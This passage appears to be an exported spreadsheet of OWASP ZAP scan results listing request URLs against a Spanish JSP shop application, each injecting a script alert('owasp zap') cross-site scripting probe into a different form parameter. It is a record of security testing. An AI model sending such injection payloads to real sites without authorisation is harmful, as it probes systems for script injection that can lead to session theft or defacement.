    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;b1=entrar</t>
  </si>
  <si>
